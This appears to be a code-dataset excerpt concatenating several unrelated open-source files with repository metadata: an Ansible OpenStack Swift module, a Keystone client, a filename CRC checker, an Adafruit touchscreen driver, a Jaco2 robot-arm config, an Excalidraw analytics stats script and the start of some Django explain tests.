openstack.cloud.object:
cloud: mordred
state: present
name: fstab
container: config
filename: /etc/fstab
- name: Delete a container called config and all of its contents
openstack.cloud.object:
cloud: rax-iad
state: absent
container: config
'''
from ansible_collections.openstack.cloud.plugins.module_utils.openstack import OpenStackModule
class SwiftObjectModule(OpenStackModule):
argument_spec = dict(
name=dict(required=False, default=None),
container=dict(required=True),
filename=dict(required=False, default=None),
container_access=dict(default='private', choices=['private', 'public']),
state=dict(default='present', choices=['absent', 'present']),
)
module_kwargs = dict()
def process_object(
self, container, name, filename, container_access, **kwargs
):
changed = False
container_obj = self.conn.get_container(container)
if kwargs['state'] == 'present':
if not container_obj:
container_obj = self.conn.create_container(container)
changed = True
if self.conn.get_container_access(container) != container_access:
self.conn.set_container_access(container, container_access)
changed = True
if name:
if self.conn.is_object_stale(container, name, filename):
self.conn.create_object(container, name, filename)
changed = True
else:
if container_obj:
if name:
if self.conn.get_object_metadata(container, name):
self.conn.delete_object(container, name)
changed = True
else:
self.conn.delete_container(container)
changed = True
return changed
def run(self):
changed = self.process_object(**self.params)
self.exit_json(changed=changed)
def main():
module = SwiftObjectModule()
module()
if __name__ == "__main__":
main()
| 28.950413 | 94 | 0.632601 |
4a22611b96edc8fb81f01c74380c74116cf63516 | 5,600 | py | Python | collectd_openstack/common/keystone_light.py | ChameleonCloud/collectd-ceilometer-plugin | 37b700647f71786e08d54e898ef8f26e22a7e127 | ["Apache-2.0"] | null | null | null | collectd_openstack/common/keystone_light.py | ChameleonCloud/collectd-ceilometer-plugin | 37b700647f71786e08d54e898ef8f26e22a7e127 | ["Apache-2.0"] | null | null | null | collectd_openstack/common/keystone_light.py | ChameleonCloud/collectd-ceilometer-plugin | 37b700647f71786e08d54e898ef8f26e22a7e127 | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Lightweight (keystone) client for the OpenStack Identity API """
import logging
import requests
LOG = logging.getLogger(__name__)
class KeystoneException(Exception):
def __init__(self, message, exc=None, response=None):
if exc:
message += "\nReason: %s" % exc
super(KeystoneException, self).__init__(message)
self.response = response
self.exception = exc
class InvalidResponse(KeystoneException):
def __init__(self, exc, response):
super(InvalidResponse, self).__init__(
"Invalid response from ident", exc, response)
class MissingServices(KeystoneException):
def __init__(self, message, exc, response):
super(MissingServices, self).__init__(
"MissingServices: " + message, exc, response)
class ClientV3(object):
"""Light weight client for the OpenStack Identity API V3.
:param string username: Username for authentication.
:param string password: Password for authentication.
:param string tenant_id: Tenant id.
:param string tenant_name: Tenant name.
:param string auth_url: Keystone service endpoint for authorization.
"""
def __init__(self, auth_url, username, password=None, tenant_id=None, tenant_name=None, token=None):
"""Initialize a new client"""
self.auth_url = auth_url
self.username = username
self.password = password
self.tenant_id = tenant_id
self.tenant_name = tenant_name
self.token = token
self._auth_token = None
self._services = ()
self._services_by_name = {}
@property
def auth_token(self):
"""Return token string usable for X-Auth-Token """
# actualize token
self.refresh()
return self._auth_token
@property
def services(self):
"""Return list of services retrieved from identity server """
return self._services
def refresh(self):
"""Refresh token and services list (getting it from identity server) """
headers = {'Accept': 'application/json'}
url = self.auth_url.rstrip('/') + '/auth/tokens'
if self.token:
identity_params = {
'methods': ['token'],
'token': {
'id': self.token
}
}
else:
identity_params = {
'methods': ['password'],
'password': {
'user': {
'name': self.username,
'domain': {'id': 'default'},
'password': self.password
}
}
}
params = {
'auth': {
'identity': identity_params,
'scope': {
'project': {
'domain': {'id': 'default'}
}
}
}
}
if self.tenant_name:
params['auth']['scope']['project']['name'] = self.tenant_name
else:
params['auth']['scope']['project']['id'] = self.tenant_id
resp = requests.post(url, json=params, headers=headers)
resp_data = None
# processing response
try:
resp.raise_for_status()
resp_data = resp.json()['token']
self._services = tuple(resp_data['catalog'])
self._services_by_name = {
service['name']: service for service in self._services
}
self._auth_token = resp.headers['X-Subject-Token']
except (TypeError, KeyError, ValueError,
requests.exceptions.HTTPError) as e:
LOG.exception("Error processing response from keystone")
raise InvalidResponse(e, resp_data)
return resp_data
def get_service_endpoint(self, name, urlkey="internalURL", region=None):
"""Return url endpoint of service
possible values of urlkey = 'adminURL' | 'publicURL' | 'internalURL'
provide region if more endpoints are available
"""
try:
endpoints = self._services_by_name[name]['endpoints']
if not endpoints:
raise MissingServices("Missing name '%s' in received services"
% name,
None, self._services)
if region:
for ep in endpoints:
if ep['region'] == region and ep['interface'] in urlkey:
return ep["url"].rstrip('/')
else:
for ep in endpoints:
if ep['interface'] in urlkey:
return ep["url"].rstrip('/')
raise MissingServices("No valid endpoints found")
except (KeyError, ValueError) as e:
LOG.exception("Error while processing endpoints")
raise MissingServices("Missing data in received services",
e, self._services)
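# Illustrative usage sketch (not part of the original module): the endpoint
# URL, credentials, tenant and service name below are placeholder assumptions.
if __name__ == '__main__':
    client = ClientV3(
        auth_url='http://keystone.example.com:5000/v3',
        username='collectd',
        password='secret',
        tenant_name='service',
    )
    # refresh() is invoked implicitly by the auth_token property
    print(client.auth_token)
    print(client.get_service_endpoint('ceilometer', urlkey='publicURL'))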
| 34.782609 | 104 | 0.56625 |
4a22628247779703738791c3c4f80f1f3c33c23b | 977 | py | Python | Anime-hash-checker.py | liamnoone/Python | 999cf3c2be622a736ffa61c83096eeda13d79bd4 | ["MIT"] | 2 | 2015-06-13T17:52:28.000Z | 2015-06-14T05:46:51.000Z | Anime-hash-checker.py | liamnoone/Python | 999cf3c2be622a736ffa61c83096eeda13d79bd4 | ["MIT"] | null | null | null | Anime-hash-checker.py | liamnoone/Python | 999cf3c2be622a736ffa61c83096eeda13d79bd4 | ["MIT"] | null | null | null |
import re
import os
from CRC import CRC
def Process(folder):
total = 0
if (os.path.exists(folder)):
for file in os.listdir(folder):
hash = ""
try:
                providedHash = re.search(r"\[([A-Z0-9]{8})\]", file).group(1)
except AttributeError:
continue
if providedHash is None:
continue
else:
total += 1
print(file, providedHash)
# Calculate hash
hash = CRC(os.path.join(folder, file))
if hash == providedHash:
print("File name matches CRC32 hash:", file)
else:
print("Invalid file: ..." +
                      file[-30:] + ". Calculated hash is", providedHash)
print("\nFinished:", total, "files processed.")
else:
print("Directory does not exist")
if __name__ == "__main__":
Process("D:/test")
| 27.138889 | 76 | 0.474923 |
4a2262d6e81a87833f9ca9fa63cf045efe87f758 | 5,266 | py | Python | adafruit_focaltouch.py | dsudduth/Adafruit_CircuitPython_FocalTouch | 3b4bf5246ecea9d88a5143ef7a3805fbae395819 | ["MIT"] | null | null | null | adafruit_focaltouch.py | dsudduth/Adafruit_CircuitPython_FocalTouch | 3b4bf5246ecea9d88a5143ef7a3805fbae395819 | ["MIT"] | null | null | null | adafruit_focaltouch.py | dsudduth/Adafruit_CircuitPython_FocalTouch | 3b4bf5246ecea9d88a5143ef7a3805fbae395819 | ["MIT"] | null | null | null |
# The MIT License (MIT)
#
# Copyright (c) 2017 ladyada for adafruit industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
`adafruit_focaltouch`
====================================================
CircuitPython driver for common low-cost FocalTech capacitive touch chips.
Currently supports FT6206 & FT6236.
* Author(s): ladyada
Implementation Notes
--------------------
**Hardware:**
* Adafruit `2.8" TFT LCD with Cap Touch Breakout Board w/MicroSD Socket
<http://www.adafruit.com/product/2090>`_ (Product ID: 2090)
* Adafruit `2.8" TFT Touch Shield for Arduino w/Capacitive Touch
<http://www.adafruit.com/product/1947>`_ (Product ID: 1947)
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the ESP8622 and M0-based boards:
https://github.com/adafruit/circuitpython/releases
* Adafruit's Bus Device library (when using I2C/SPI):
https://github.com/adafruit/Adafruit_CircuitPython_BusDevice
"""
# imports
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_FocalTouch.git"
try:
import struct
except ImportError:
import ustruct as struct
from adafruit_bus_device.i2c_device import I2CDevice
from micropython import const
_FT6206_DEFAULT_I2C_ADDR = 0x38
_FT6XXX_REG_DATA = const(0x00)
_FT6XXX_REG_NUMTOUCHES = const(0x02)
_FT6XXX_REG_THRESHHOLD = const(0x80)
_FT6XXX_REG_POINTRATE = const(0x88)
_FT6XXX_REG_LIBH = const(0xA1)
_FT6XXX_REG_LIBL = const(0xA2)
_FT6XXX_REG_CHIPID = const(0xA3)
_FT6XXX_REG_FIRMVERS = const(0xA6)
_FT6XXX_REG_VENDID = const(0xA8)
_FT6XXX_REG_RELEASE = const(0xAF)
class Adafruit_FocalTouch:
"""
A driver for the FocalTech capacitive touch sensor.
"""
_debug = False
chip = None
def __init__(self, i2c, address=_FT6206_DEFAULT_I2C_ADDR, debug=False):
self._i2c = I2CDevice(i2c, address)
self._debug = debug
chip_data = self._read(_FT6XXX_REG_LIBH, 8)
lib_ver, chip_id, _, _, firm_id, _, vend_id = struct.unpack('>HBBBBBB', chip_data)
if vend_id != 0x11:
raise RuntimeError("Did not find FT chip")
if chip_id == 0x06:
self.chip = "FT6206"
elif chip_id == 0x64:
self.chip = "FT6236"
if debug:
print("Library vers %04X" % lib_ver)
print("Firmware ID %02X" % firm_id)
print("Point rate %d Hz" % self._read(_FT6XXX_REG_POINTRATE, 1)[0])
print("Thresh %d" % self._read(_FT6XXX_REG_THRESHHOLD, 1)[0])
@property
def touched(self):
""" Returns the number of touches currently detected """
return self._read(_FT6XXX_REG_NUMTOUCHES, 1)[0]
# pylint: disable=unused-variable
@property
def touches(self):
"""
Returns a list of touchpoint dicts, with 'x' and 'y' containing the
touch coordinates, and 'id' as the touch # for multitouch tracking
"""
touchpoints = []
data = self._read(_FT6XXX_REG_DATA, 32)
for i in range(2):
point_data = data[i*6+3 : i*6+9]
if all([i == 0xFF for i in point_data]):
continue
#print([hex(i) for i in point_data])
x, y, weight, misc = struct.unpack('>HHBB', point_data)
#print(x, y, weight, misc)
touch_id = y >> 12
x &= 0xFFF
y &= 0xFFF
point = {'x':x, 'y':y, 'id':touch_id}
touchpoints.append(point)
return touchpoints
# pylint: enable=unused-variable
def _read(self, register, length):
"""Returns an array of 'length' bytes from the 'register'"""
with self._i2c as i2c:
i2c.write(bytes([register & 0xFF]))
result = bytearray(length)
i2c.readinto(result)
if self._debug:
print("\t$%02X => %s" % (register, [hex(i) for i in result]))
return result
def _write(self, register, values):
"""Writes an array of 'length' bytes to the 'register'"""
with self._i2c as i2c:
values = [(v & 0xFF) for v in [register]+values]
i2c.write(bytes(values))
if self._debug:
print("\t$%02X <= %s" % (values[0], [hex(i) for i in values[1:]]))
| 33.974194 | 90 | 0.653437 |
4a22643a123a0ad95ad0de98cef1d01003682e37 | 13,361 | py | Python | abr_control/arms/jaco2/config.py | cambel/abr_control | 85c116dfc3f1561a85d6b915beb75d8a2b3980d2 | ["BSD-3-Clause"] | null | null | null | abr_control/arms/jaco2/config.py | cambel/abr_control | 85c116dfc3f1561a85d6b915beb75d8a2b3980d2 | ["BSD-3-Clause"] | null | null | null | abr_control/arms/jaco2/config.py | cambel/abr_control | 85c116dfc3f1561a85d6b915beb75d8a2b3980d2 | ["BSD-3-Clause"] | null | null | null |
# Config file for Jaco 2 in VREP
import numpy as np
import sympy as sp
import abr_control
from ..base_config import BaseConfig
class Config(BaseConfig):
""" Robot config file for the Kinova Jaco^2 V2
Parameters
----------
hand_attached : boolean, optional (Default: False)
if false will set the last wrist joint as the end effector
if true will set the palm of the hand as the end effector
Attributes
----------
REST_ANGLES : numpy.array
the joint angles the arm tries to push towards with the
null controller
_M_LINKS : sympy.diag
inertia matrix of the links
_M_JOINTS : sympy.diag
inertia matrix of the joints
L : numpy.array
segment lengths of arm [meters]
L_HANDCOM : numpy.array
offset to the center of mass of the hand [meters]
Transform Naming Convention: Tpoint1point2
    ex: Tj1l1 transforms from joint 1 to link 1
Transforms are broken up into two matrices for simplification
ex: Tj0l1a and Tj0l1b where the former transform accounts for
joint rotations and the latter accounts for static rotations
and translations
"""
def __init__(self, hand_attached=False, **kwargs):
self.hand_attached = hand_attached
N_LINKS = 7 if hand_attached is True else 6
super(Config, self).__init__(
N_JOINTS=6, N_LINKS=N_LINKS, ROBOT_NAME='jaco2', **kwargs)
if self.MEANS is None:
self.MEANS = { # expected mean of joint angles / velocities
'q': np.ones(self.N_JOINTS) * np.pi,
'dq': np.array([-0.01337, 0.00192, 0.00324,
0.02502, -0.02226, -0.01342])
}
if self.SCALES is None:
self.SCALES = { # expected variance of joint angles / velocities
'q': np.ones(self.N_JOINTS) * np.pi * np.sqrt(self.N_JOINTS),
'dq': (np.array([1.22826, 2.0, 1.42348,
2.58221, 2.50768, 1.27004])
* np.sqrt(self.N_JOINTS))
}
self._T = {} # dictionary for storing calculated transforms
# set up saved functions folder to be in the abr_jaco repo
self.config_folder += ('with_hand' if self.hand_attached is True
else 'no_hand')
# make config folder if it doesn't exist
abr_control.utils.os_utils.makedirs(self.config_folder)
self.JOINT_NAMES = ['joint%i' % ii
for ii in range(self.N_JOINTS)]
self.REST_ANGLES = np.array(
[None, 2.42, 2.42, 0.0, 0.0, 0.0], dtype='float32')
# inertia values in VREP are divided by mass, account for that here
self._M_LINKS = [
sp.diag(0.5, 0.5, 0.5, 0.02, 0.02, 0.02), # link0
sp.diag(0.5, 0.5, 0.5, 0.02, 0.02, 0.02), # link1
sp.diag(0.5, 0.5, 0.5, 0.02, 0.02, 0.02), # link2
sp.diag(0.5, 0.5, 0.5, 0.02, 0.02, 0.02), # link3
sp.diag(0.5, 0.5, 0.5, 0.02, 0.02, 0.02), # link3
sp.diag(0.5, 0.5, 0.5, 0.02, 0.02, 0.02), # link4
sp.diag(0.25, 0.25, 0.25, 0.01, 0.01, 0.01)] # link5
if self.hand_attached is True:
self._M_LINKS.append(
sp.diag(0.37, 0.37, 0.37, 0.04, 0.04, 0.04)) # link6
# the joints don't weigh anything in VREP
self._M_JOINTS = [sp.zeros(6, 6) for ii in range(self.N_JOINTS)]
# ignoring lengths < 1e-6
self.L = [
[0.0, 0.0, 7.8369e-02], # link 0 offset
[-3.2712e-05, -1.7324e-05, 7.8381e-02], # joint 0 offset
[2.1217e-05, 4.8455e-05, -7.9515e-02], # link 1 offset
[-2.2042e-05, 1.3245e-04, -3.8863e-02], # joint 1 offset
[-1.9519e-03, 2.0902e-01, -2.8839e-02], # link 2 offset
[-2.3094e-02, -1.0980e-06, 2.0503e-01], # joint 2 offset
[-4.8786e-04, -8.1945e-02, -1.2931e-02], # link 3 offset
[2.5923e-04, -3.8935e-03, -1.2393e-01], # joint 3 offset
[-4.0053e-04, 1.2581e-02, -3.5270e-02], # link 4 offset
[-2.3603e-03, -4.8662e-03, 3.7097e-02], # joint 4 offset
[-5.2974e-04, 1.2272e-02, -3.5485e-02], # link 5 offset
[-1.9534e-03, 5.0298e-03, -3.7176e-02]] # joint 5 offset
if self.hand_attached is True: # add in hand offset
self.L.append([0.0, 0.0, 0.0]) # offset for the end of fingers
self.L = np.array(self.L)
if self.hand_attached is True: # add in hand offset
self.L_HANDCOM = np.array([0.0, 0.0, -0.08]) # com of the hand
# ---- Transform Matrices ----
# Transform matrix : origin -> link 0
# no change of axes, account for offsets
self.Torgl0 = sp.Matrix([
[1, 0, 0, self.L[0, 0]],
[0, 1, 0, self.L[0, 1]],
[0, 0, 1, self.L[0, 2]],
[0, 0, 0, 1]])
# Transform matrix : link0 -> joint 0
# account for change of axes and offsets
self.Tl0j0 = sp.Matrix([
[1, 0, 0, self.L[1, 0]],
[0, -1, 0, self.L[1, 1]],
[0, 0, -1, self.L[1, 2]],
[0, 0, 0, 1]])
# Transform matrix : joint 0 -> link 1
# account for rotations due to q
self.Tj0l1a = sp.Matrix([
[sp.cos(self.q[0]), -sp.sin(self.q[0]), 0, 0],
[sp.sin(self.q[0]), sp.cos(self.q[0]), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
# account for change of axes and offsets
self.Tj0l1b = sp.Matrix([
[-1, 0, 0, self.L[2, 0]],
[0, -1, 0, self.L[2, 1]],
[0, 0, 1, self.L[2, 2]],
[0, 0, 0, 1]])
self.Tj0l1 = self.Tj0l1a * self.Tj0l1b
# Transform matrix : link 1 -> joint 1
# account for axes rotation and offset
self.Tl1j1 = sp.Matrix([
[1, 0, 0, self.L[3, 0]],
[0, 0, -1, self.L[3, 1]],
[0, 1, 0, self.L[3, 2]],
[0, 0, 0, 1]])
# Transform matrix : joint 1 -> link 2
# account for rotations due to q
self.Tj1l2a = sp.Matrix([
[sp.cos(self.q[1]), -sp.sin(self.q[1]), 0, 0],
[sp.sin(self.q[1]), sp.cos(self.q[1]), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
# account for axes rotation and offsets
self.Tj1l2b = sp.Matrix([
[0, -1, 0, self.L[4, 0]],
[0, 0, 1, self.L[4, 1]],
[-1, 0, 0, self.L[4, 2]],
[0, 0, 0, 1]])
self.Tj1l2 = self.Tj1l2a * self.Tj1l2b
# Transform matrix : link 2 -> joint 2
# account for axes rotation and offsets
self.Tl2j2 = sp.Matrix([
[0, 0, 1, self.L[5, 0]],
[1, 0, 0, self.L[5, 1]],
[0, 1, 0, self.L[5, 2]],
[0, 0, 0, 1]])
# Transform matrix : joint 2 -> link 3
# account for rotations due to q
self.Tj2l3a = sp.Matrix([
[sp.cos(self.q[2]), -sp.sin(self.q[2]), 0, 0],
[sp.sin(self.q[2]), sp.cos(self.q[2]), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
# account for axes rotation and offsets
self.Tj2l3b = sp.Matrix([
[0.14262926, -0.98977618, 0, self.L[6, 0]],
[0, 0, 1, self.L[6, 1]],
[-0.98977618, -0.14262926, 0, self.L[6, 2]],
[0, 0, 0, 1]])
self.Tj2l3 = self.Tj2l3a * self.Tj2l3b
# Transform matrix : link 3 -> joint 3
# account for axes change and offsets
self.Tl3j3 = sp.Matrix([
[-0.14262861, -0.98977628, 0, self.L[7, 0]],
[0.98977628, -0.14262861, 0, self.L[7, 1]],
[0, 0, 1, self.L[7, 2]],
[0, 0, 0, 1]])
# Transform matrix: joint 3 -> link 4
# account for rotations due to q
self.Tj3l4a = sp.Matrix([
[sp.cos(self.q[3]), -sp.sin(self.q[3]), 0, 0],
[sp.sin(self.q[3]), sp.cos(self.q[3]), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
# account for axes and rotation and offsets
self.Tj3l4b = sp.Matrix([
[0.85536427, -0.51802699, 0, self.L[8, 0]],
[-0.45991232, -0.75940555, 0.46019982, self.L[8, 1]],
[-0.23839593, -0.39363848, -0.88781537, self.L[8, 2]],
[0, 0, 0, 1]])
self.Tj3l4 = self.Tj3l4a * self.Tj3l4b
# Transform matrix: link 4 -> joint 4
# no axes change, account for offsets
self.Tl4j4 = sp.Matrix([
[-0.855753802, 0.458851168, 0.239041914, self.L[9, 0]],
[0.517383113, 0.758601438, 0.396028500, self.L[9, 1]],
[0, 0.462579144, -0.886577910, self.L[9, 2]],
[0, 0, 0, 1]])
# Transform matrix: joint 4 -> link 5
# account for rotations due to q
self.Tj4l5a = sp.Matrix([
[sp.cos(self.q[4]), -sp.sin(self.q[4]), 0, 0],
[sp.sin(self.q[4]), sp.cos(self.q[4]), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
# account for axes and rotation and offsets
# no axes change, account for offsets
self.Tj4l5b = sp.Matrix([
[0.89059413, 0.45479896, 0, self.L[10, 0]],
[-0.40329059, 0.78972966, -0.46225942, self.L[10, 1]],
[-0.2102351, 0.41168552, 0.88674474, self.L[10, 2]],
[0, 0, 0, 1]])
self.Tj4l5 = self.Tj4l5a * self.Tj4l5b
# Transform matrix : link 5 -> joint 5
# account for axes change and offsets
self.Tl5j5 = sp.Matrix([
[-0.890598824, 0.403618758, 0.209584432, self.L[11, 0]],
[-0.454789710, -0.790154512, -0.410879747, self.L[11, 1]],
[0, -0.461245863, 0.887272337, self.L[11, 2]],
[0, 0, 0, 1]])
if self.hand_attached is True: # add in hand offset
# Transform matrix: joint 5 -> link 6 / hand COM
# account for rotations due to q
self.Tj5handcoma = sp.Matrix([
[sp.cos(self.q[5]), -sp.sin(self.q[5]), 0, 0],
[sp.sin(self.q[5]), sp.cos(self.q[5]), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
# account for axes changes and offsets
self.Tj5handcomb = sp.Matrix([
[-1, 0, 0, self.L_HANDCOM[0]],
[0, 1, 0, self.L_HANDCOM[1]],
[0, 0, -1, self.L_HANDCOM[2]],
[0, 0, 0, 1]])
self.Tj5handcom = self.Tj5handcoma * self.Tj5handcomb
# no axes change, account for offsets
self.Thandcomfingers = sp.Matrix([
[1, 0, 0, self.L[12, 0]],
[0, 1, 0, self.L[12, 1]],
[0, 0, 1, self.L[12, 2]],
[0, 0, 0, 1]])
# orientation part of the Jacobian (compensating for angular velocity)
self.J_orientation = [
self._calc_T('joint0')[:3, :3] * self._KZ, # joint 0 orientation
self._calc_T('joint1')[:3, :3] * self._KZ, # joint 1 orientation
self._calc_T('joint2')[:3, :3] * self._KZ, # joint 2 orientation
self._calc_T('joint3')[:3, :3] * self._KZ, # joint 3 orientation
self._calc_T('joint4')[:3, :3] * self._KZ, # joint 4 orientation
self._calc_T('joint5')[:3, :3] * self._KZ] # joint 5 orientation
def _calc_T(self, name): # noqa C907
""" Uses Sympy to generate the transform for a joint or link
name : string
name of the joint, link, or end-effector
"""
if self._T.get(name, None) is None:
if name == 'link0':
self._T[name] = self.Torgl0
elif name == 'joint0':
self._T[name] = self._calc_T('link0') * self.Tl0j0
elif name == 'link1':
self._T[name] = self._calc_T('joint0') * self.Tj0l1
elif name == 'joint1':
self._T[name] = self._calc_T('link1') * self.Tl1j1
elif name == 'link2':
self._T[name] = self._calc_T('joint1') * self.Tj1l2
elif name == 'joint2':
self._T[name] = self._calc_T('link2') * self.Tl2j2
elif name == 'link3':
self._T[name] = self._calc_T('joint2') * self.Tj2l3
elif name == 'joint3':
self._T[name] = self._calc_T('link3') * self.Tl3j3
elif name == 'link4':
self._T[name] = self._calc_T('joint3') * self.Tj3l4
elif name == 'joint4':
self._T[name] = self._calc_T('link4') * self.Tl4j4
elif name == 'link5':
self._T[name] = self._calc_T('joint4') * self.Tj4l5
elif name == 'joint5':
self._T[name] = self._calc_T('link5') * self.Tl5j5
elif self.hand_attached is False and name == 'EE':
self._T[name] = self._calc_T('joint5')
elif self.hand_attached is True and name == 'link6':
self._T[name] = self._calc_T('joint5') * self.Tj5handcom
elif self.hand_attached is True and name == 'EE':
self._T[name] = self._calc_T('link6') * self.Thandcomfingers
else:
raise Exception('Invalid transformation name: %s' % name)
return self._T[name]
| 41.365325 | 78 | 0.502058 |
4a226564cbad6fffee8dcadb0db744869fbbc7a9 | 4,857 | py | Python | stats.py | marcottebear/excalidraw-libraries | b812c95129f88474d3e0da4a0b51f135f8cc05f8 | [
"MIT"
] | null | null | null | stats.py | marcottebear/excalidraw-libraries | b812c95129f88474d3e0da4a0b51f135f8cc05f8 | [
"MIT"
] | null | null | null | stats.py | marcottebear/excalidraw-libraries | b812c95129f88474d3e0da4a0b51f135f8cc05f8 | [
"MIT"
] | null | null | null | from apiclient.discovery import build
from datetime import date
from datetime import timedelta
from oauth2client.service_account import ServiceAccountCredentials
import os
import json
SCOPES = ["https://www.googleapis.com/auth/analytics.readonly"]
VIEW_ID = "208661610"
THRESSHOLD = 10
ROOT_DIR = os.path.dirname(os.path.realpath(__file__))
STATS_DIR = os.path.join(ROOT_DIR, "stats")
KEY_FILE = os.path.join(ROOT_DIR, "excalidraw-key.json")
MAP = {
"Android": "g-script-android",
"Apple Devices Frames": "franky47-apple-devices-frames",
"Charts": "g-script-charts",
"Data Viz": "dbssticky-DataViz",
"Dropdowns": "h7y-dropdowns",
"Forms": "g-script-forms",
"Gadgets": "morgemoensch-gadgets",
"Hearts": "dwelle-hearts",
"Information Architecture": "inwardmovement-information-architecture",
"IT Logos": "pclainchard-it-logos",
"Medias": "g-script-medias",
"Polygons": "lipis-polygons",
"RaspberryPI": "revolunet-raspberrypi3",
"Software Architecture": "youritjang-software-architecture",
"Stars": "lipis-stars",
"Stick figures": "youritjang-stick-figures",
"Stick Figures": "youritjang-stick-figures",
}
def initialize_analyticsreporting():
credentials = ServiceAccountCredentials.from_json_keyfile_name(KEY_FILE, SCOPES)
return build("analyticsreporting", "v4", credentials=credentials)
def get_library_report(analytics, day="yesterday"):
return (
analytics.reports()
.batchGet(
body={
"reportRequests": [
{
"viewId": VIEW_ID,
"dateRanges": [{"startDate": day, "endDate": day}],
"metrics": [{"expression": "ga:totalEvents"}],
"dimensions": [
{"name": "ga:eventCategory"},
{"name": "ga:eventAction"},
{"name": "ga:eventLabel"},
],
}
]
}
)
.execute()
)
def print_library_response(response):
counts = {}
for report in response.get("reports", []):
for row in report.get("data", {}).get("rows", []):
dimensions = row.get("dimensions", [])
metrics = row.get("metrics", [])
if not (
dimensions[0] == "library"
and dimensions[1] in ["download", "import"]
and dimensions[2] != "(not set)"
):
continue
label = dimensions[2]
label = label if label not in MAP else MAP[label]
value = int(metrics[0]["values"][0])
if label in counts:
counts[label] += value
else:
counts[label] = value
for download in counts:
print(download, ":", counts[download])
return counts
def main():
if not os.path.exists(KEY_FILE):
print("Key file not found", KEY_FILE)
return
today = date.today()
# Set current date to 2020-12-11 to count all visits from the beginning:
current_date = date(2020, 12, 11)
stats = {}
analytics = initialize_analyticsreporting()
total_downloads = 0
total_downloads_day = 0
total_downloads_week = 0
while current_date <= today:
day = current_date.strftime("%Y-%m-%d")
print()
print(day)
print("-" * 40)
response = get_library_report(analytics, day)
libraries = print_library_response(response)
for library in libraries:
total = libraries[library]
total_downloads += total
if library in stats:
stats[library]["total"] += total
else:
stats[library] = {"total": total, "week": 0}
if current_date > today + timedelta(days=-7):
total_downloads_week += total
stats[library]["week"] += total
if current_date == today:
total_downloads_day += total
if libraries:
with open(os.path.join(STATS_DIR, day + ".json"), "w") as outfile:
json.dump(libraries, outfile, indent=2)
if stats:
with open(os.path.join(ROOT_DIR, "stats.json"), "w") as outfile:
json.dump(stats, outfile, indent=2)
with open(os.path.join(ROOT_DIR, "total.json"), "w") as outfile:
json.dump(
{
"total": total_downloads,
"week": total_downloads_week,
"day": total_downloads_day,
},
outfile,
indent=2,
)
current_date += timedelta(days=1)
print()
if __name__ == "__main__":
main()
| 32.817568 | 84 | 0.544781 |
4a22656657f832889f8bd514330480dfa1fe4cc4 | 5,190 | py | Python | tests/queries/test_explain.py | agarwalutkarsh554/django | 5ea9254530831bcdbf3af694f7cf08584fc8c051 | ["CNRI-Python-GPL-Compatible", "BSD-3-Clause"] | 7 | 2015-09-08T22:23:36.000Z | 2022-03-08T09:24:40.000Z | tests/queries/test_explain.py | agarwalutkarsh554/django | 5ea9254530831bcdbf3af694f7cf08584fc8c051 | ["CNRI-Python-GPL-Compatible", "BSD-3-Clause"] | 8 | 2017-04-19T16:20:47.000Z | 2022-03-28T14:40:11.000Z | tests/queries/test_explain.py | agarwalutkarsh554/django | 5ea9254530831bcdbf3af694f7cf08584fc8c051 | ["CNRI-Python-GPL-Compatible", "BSD-3-Clause"] | 3 | 2020-07-13T04:49:16.000Z | 2021-12-22T21:15:14.000Z |
import unittest
from django.db import NotSupportedError, connection, transaction
from django.db.models import Count
from django.test import TestCase, skipIfDBFeature, skipUnlessDBFeature
from django.test.utils import CaptureQueriesContext
from .models import Tag
@skipUnlessDBFeature('supports_explaining_query_execution')
class ExplainTests(TestCase):
def test_basic(self):
querysets = [
Tag.objects.filter(name='test'),
Tag.objects.filter(name='test').select_related('parent'),
Tag.objects.filter(name='test').prefetch_related('children'),
Tag.objects.filter(name='test').annotate(Count('children')),
Tag.objects.filter(name='test').values_list('name'),
Tag.objects.order_by().union(Tag.objects.order_by().filter(name='test')),
Tag.objects.all().select_for_update().filter(name='test'),
]
supported_formats = connection.features.supported_explain_formats
all_formats = (None,) + tuple(supported_formats) + tuple(f.lower() for f in supported_formats)
for idx, queryset in enumerate(querysets):
for format in all_formats:
with self.subTest(format=format, queryset=idx):
with self.assertNumQueries(1), CaptureQueriesContext(connection) as captured_queries:
result = queryset.explain(format=format)
self.assertTrue(captured_queries[0]['sql'].startswith(connection.ops.explain_prefix))
self.assertIsInstance(result, str)
self.assertTrue(result)
@skipUnlessDBFeature('validates_explain_options')
def test_unknown_options(self):
with self.assertRaisesMessage(ValueError, 'Unknown options: test, test2'):
Tag.objects.all().explain(test=1, test2=1)
def test_unknown_format(self):
msg = 'DOES NOT EXIST is not a recognized format.'
